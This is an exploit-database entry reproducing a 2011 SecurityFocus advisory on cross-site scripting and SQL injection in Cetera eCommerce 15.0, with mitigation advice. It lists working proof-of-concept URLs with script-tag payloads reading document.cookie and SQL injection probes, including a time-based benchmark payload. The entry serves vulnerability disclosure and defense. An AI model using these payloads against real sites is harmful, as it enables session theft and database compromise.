header-logo
Suggest Exploit
vendor:
Cetera eCommerce
by:
SecurityFocus
7.5
CVSS
HIGH
Cross-Site Scripting and SQL-Injection
79, 89
CWE
Product Name: Cetera eCommerce
Affected Version From: 15
Affected Version To: 15
Patch Exists: NO
Related CWE: N/A
CPE: a:cetera_ecommerce:cetera_ecommerce
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

Cetera eCommerce Multiple Cross-Site Scripting and SQL-Injection Vulnerabilities

Cetera eCommerce is prone to multiple cross-site scripting and SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Cross Site Scripting examples include: http://www.example.com/catalog/%3Cscript%3Ealert(document.cookie)%3C/script%3E/, http://www.example.com/vendors/%3Cscript%3Ealert(document.cookie)%3C/script%3E/, http://www.example.com/catalog/cart/%3Cscript%3Ealert(document.cookie)%3C/script%3E/, http://www.example.com/news/%3Cscript%3Ealert(document.cookie)%3C/script%3E/, http://www.example.com/news/13012011111030/%3Cscript%3Ealert(document.cookie)%3C/script%3E/, http://www.example.com/%3Cscript%3Ealert(document.cookie)%3C/script%3E/. SQL Injection examples include: http://www.example.com/catalog/(version()=5.1)/, http://www.example.com/catalog/cart/.+benchmark(100000,md5(now()))+./

Mitigation:

Input validation should be used to ensure that untrusted data is not used to execute unintended commands or queries. It is also recommended to use a whitelist of accepted inputs that strictly conform to specifications. Additionally, it is recommended to use an escape mechanism to prevent malicious SQL queries from being executed.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/47044/info

Cetera eCommerce is prone to multiple cross-site scripting and SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Cetera eCommerce versions 15.0 and prior are vulnerable. 

Cross Site Scripting:

http://www.example.com/catalog/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://www.example.com/vendors/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://www.example.com/catalog/cart/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://www.example.com/news/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://www.example.com/news/13012011111030/%3Cscript%3Ealert(document.cookie)%3C/script%3E/
http://www.example.com/%3Cscript%3Ealert(document.cookie)%3C/script%3E/

This vulnerability have appeared in version 15.0. Vulnerability takes place
at page with error 404, so it'll work as at this URL, as at other URLs,
which lead to non-existent pages.

SQL Injection:

http://www.example.com/catalog/(version()=5.1)/
http://www.example.com/catalog/cart/.+benchmark(100000,md5(now()))+./